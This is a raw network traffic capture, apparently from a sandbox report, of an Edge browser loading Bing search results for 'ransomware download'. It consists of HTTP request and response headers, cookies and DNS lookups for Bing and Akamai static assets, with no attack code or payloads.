sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1205
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
-
Remote address:8.8.8.8:53Request152.128.123.92.in-addr.arpaIN PTRResponse152.128.123.92.in-addr.arpaIN PTRa92-123-128-152deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestth.bing.comIN AResponseth.bing.comIN CNAMEp-th.bing.com.trafficmanager.netp-th.bing.com.trafficmanager.netIN CNAMEth.bing.com.edgekey.netth.bing.com.edgekey.netIN CNAMEe86303.dscx.akamaiedge.nete86303.dscx.akamaiedge.netIN A92.123.128.169e86303.dscx.akamaiedge.netIN A92.123.128.177e86303.dscx.akamaiedge.netIN A92.123.128.172e86303.dscx.akamaiedge.netIN A92.123.128.168e86303.dscx.akamaiedge.netIN A92.123.128.167e86303.dscx.akamaiedge.netIN A92.123.128.170e86303.dscx.akamaiedge.netIN A92.123.128.176e86303.dscx.akamaiedge.netIN A92.123.128.174e86303.dscx.akamaiedge.netIN A92.123.128.166
-
Remote address:8.8.8.8:53Requestr.bing.comIN AResponser.bing.comIN CNAMEp-static.bing.trafficmanager.netp-static.bing.trafficmanager.netIN CNAMEr.bing.com.edgekey.netr.bing.com.edgekey.netIN CNAMEe86303.dscx.akamaiedge.nete86303.dscx.akamaiedge.netIN A92.123.128.139e86303.dscx.akamaiedge.netIN A92.123.128.194e86303.dscx.akamaiedge.netIN A92.123.128.140e86303.dscx.akamaiedge.netIN A92.123.128.133e86303.dscx.akamaiedge.netIN A92.123.128.195e86303.dscx.akamaiedge.netIN A92.123.128.144e86303.dscx.akamaiedge.netIN A92.123.128.132e86303.dscx.akamaiedge.netIN A92.123.128.134e86303.dscx.akamaiedge.netIN A92.123.128.142
-
Remote address:92.123.128.139:443RequestGET /rp/grT3cLlVZjA8qRHZG_Qwe-GLhWQ.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
purpose: prefetch
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
content-type: text/css; charset=utf-8
content-encoding: br
content-md5: 6y9hZqI1PMudAsptKHAWfQ==
last-modified: Mon, 26 Feb 2024 22:27:00 GMT
etag: 0x8DC371A0CD252D0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a088e7bb-401e-000c-1c46-69d222000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.47281102.1709022871.177c0a52
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=226941
expires: Sun, 03 Mar 2024 06:34:09 GMT
date: Thu, 29 Feb 2024 15:31:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220708.626d7de
timing-allow-origin: *
-
GEThttps://r.bing.com/rb/H/cir3,as,cc,nc/XuMXsYbF4DN-kSF16oeMfXSEomQ.css?bu=IosGrgOuA78ErgOuA64DrgOuA64DhQeHB-gGrgOuA64DrgPeBoMFugauA64D-wauA5oFrgOJB5YHrgOuA-AE8ATyBK4D&or=wmsedge.exeRemote address:92.123.128.139:443RequestGET /rb/H/cir3,as,cc,nc/XuMXsYbF4DN-kSF16oeMfXSEomQ.css?bu=IosGrgOuA78ErgOuA64DrgOuA64DhQeHB-gGrgOuA64DrgPeBoMFugauA64D-wauA5oFrgOJB5YHrgOuA-AE8ATyBK4D&or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
purpose: prefetch
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
content-type: text/css; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Tue, 20 Jul 2010 16:08:21 GMT
x-eventid: 65dd6d036be84e8d800a54aa6e60f598
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E049
x-as-suppresssetcookie: 1
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-pVxv2W4M+9JFW68SEnXSp1onzhDhvYwAvdwj7OyMkFI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
cache-control: public, max-age=221431
expires: Sun, 03 Mar 2024 05:02:20 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d802
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: iRh5eBPrKqjGuvgWi/nStw==
last-modified: Sat, 04 Feb 2023 02:14:41 GMT
etag: 0x8DB065592FB5754
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1a567dcd-a01e-0070-46fe-bd59a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=139632
expires: Sat, 02 Mar 2024 06:19:01 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d968
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: G0HPjgI1nZPfetni3YDkOw==
last-modified: Sat, 04 Feb 2023 02:14:41 GMT
etag: 0x8DB065592FB5754
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e16ceef5-301e-00b9-1fb8-f9e44b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=101837
expires: Fri, 01 Mar 2024 19:49:06 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d967
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/2Ro4LD_2OaiuqUlZYlpozEd7Bf0.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: 7vaiDQSV+XNwvtSiPZgYiA==
last-modified: Tue, 25 Jul 2023 16:32:01 GMT
etag: 0x8DB8D2CAC78F7D0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8fd736a7-d01e-00c3-5cfc-c2f90b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=77611
expires: Fri, 01 Mar 2024 13:05:20 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d96e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: 2e0aQjQvN2lVcUGQcPjoGA==
last-modified: Wed, 17 Aug 2022 06:27:13 GMT
etag: 0x8DA801986136A14
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 113462fe-001e-00a2-771a-07da48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=235373
expires: Sun, 03 Mar 2024 08:54:42 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbcb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: kc0Rz8ymXPrOlhUyaNcfYw==
last-modified: Fri, 12 Aug 2022 20:45:00 GMT
etag: 0x8DA7CA3867FC831
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: adc41e54-901e-0086-2e09-15d69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.097b1060.1686747743.2aab8902
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.097b1060.1686747764.2aac12e8
akamai-grn: 0.2a7b1060.1687568922.2d70b24a
akamai-grn: 0.3d7b1060.1689052474.2206a8cd
akamai-grn: 0.21aedd58.1689771282.bd10a3b
cache-control: public, no-transform, max-age=8471373
expires: Thu, 06 Jun 2024 16:41:22 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbcc
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: 44eVtjQVTsH/Qca82lTuUg==
last-modified: Wed, 17 Aug 2022 05:32:54 GMT
etag: 0x8DA8011EF4B96D3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f7e5ecaf-101e-0038-1cc0-eb4491000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=109564
expires: Fri, 01 Mar 2024 21:57:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbcd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: YgWAZX6KRbSnuEULjaXNMg==
last-modified: Wed, 17 Aug 2022 06:37:27 GMT
etag: 0x8DA801AF3BF6066
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 22530e3a-d01e-00c3-2ce9-28f90b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=235204
expires: Sun, 03 Mar 2024 08:51:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbcf
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
